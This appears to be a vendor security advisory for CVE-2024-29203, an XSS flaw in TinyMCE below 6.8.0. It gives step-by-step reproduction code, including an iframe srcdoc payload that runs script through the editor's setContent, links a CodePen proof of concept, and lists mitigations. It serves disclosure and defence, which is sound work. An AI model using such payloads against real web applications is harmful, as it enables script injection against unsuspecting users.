Overview
TinyMCE is a web-based JavaScript HTML WYSIWYG editor control.
A Cross-Site Scripting (XSS) vulnerability (CVE-2024-29203) has been identified in TinyMCE, which allows iframe elements containing malicious code to execute when inserted into the editor. Attacks are limited by same-origin browser protections, but could still trigger operations such as downloading of malicious assets.
Per OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. An attacker can use XSS to send a malicious script to an unsuspecting user.
This issue affects TinyMCE versions less than 6.8.0.
Details
Module Info
- Product: TinyMCE
- Affected packages: tinymce
- Affected versions: <6.8.0 and <7.0.0*
- GitHub repository: https://github.com/tinymce/tinymce
- Published packages: https://www.npmjs.com/package/tinymce
- Package manager: npm
- Fixed in: OSS TinyMCE v6.8.0 and v7.0.0* and NES for TinyMCE v6.8.7
*: The fix is opt-in in v6.8.0 and is enabled by default in v7.0.0.
Vulnerability Info
This Medium-severity vulnerability is found in TinyMCE versions less than 6.8.0.
In versions greater than or equal to 6.8.0, there is a way to resolve this vulnerability directly by setting the editor option sandbox_iframes to be true, but by default this option is set to false. This was changed in version 7.0.0 to be true by default.
Steps To Reproduce
- Create a folder and name it public. Copy the TinyMCE files into this folder so that the path ./public/tinymce/tinymce.min.js is valid. For example, if you used npm to install tinymce, copy the contents of the folder node_modules/tinymce into public/tinymce.
- Create an HTML file next to the public folder that was just created. Add the self-hosted TinyMCE script to the <head> section. For example:
<script src="public/tinymce/tinymce.min.js"></script>
- In the body of the HTML file, add a section with a button and a textarea. This will be to display the XSS via iframe[srcdoc]. For example:
<div>
<button onclick="injectIframePayload()">Inject iframe[srcdoc] Payload
</button>
<textarea id="editor"></textarea>
</div>
- Add an instance of TinyMCE in a <script> section. For example:
let editor;
tinymce.init({
selector: '#editor',
extended_valid_elements: 'iframe[src|srcdoc|sandbox]',
setup: (data) => {
editor = data;
}
});
- In the same <script> section, add two functions that were referenced earlier in the second step. For example:
function injectIframePayload() {
const html = `<iframe srcdoc="<script>alert('CVE-2024-29203')<\/script>"></iframe>`;
editor?.setContent(html);
}
- Run the application and click on the Inject iframe[srcdoc] Payload button. A popup will appear demonstrating the Cross-Site Scripting (XSS) vulnerability.
Proof Of Concept
A full reproduction with code similar to the above can be found here:
HTML injection XSS vulnerability POC
<iframe height="300" style="width: 100%;" scrolling="no" title="TinyMCE vulnerability: XSS vulnerability in Handling Iframes" src="https://codepen.io/herodevs/embed/xbGyjyv/299b960421ba116f94e660cfb2d3d4f8?default-tab=html%2Cresult" frameborder="no" loading="lazy" allowtransparency="true" allowfullscreen="true">
See the Pen <a href="https://codepen.io/herodevs/pen/xbGyjyv/299b960421ba116f94e660cfb2d3d4f8">
TinyMCE vulnerability: XSS vulnerability in Handling Iframes</a> by HeroDevs (<a href="https://codepen.io/herodevs">@herodevs</a>)
on <a href="https://codepen.io">CodePen</a>.
</iframe>
Mitigation
TinyMCE versions below 6.8 are End-of-Life and will not receive any updates to address this issue. For more information see here.
Users of the affected components should apply one of the following mitigations:
- Migrate affected applications to a version of TinyMCE that includes the fix.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.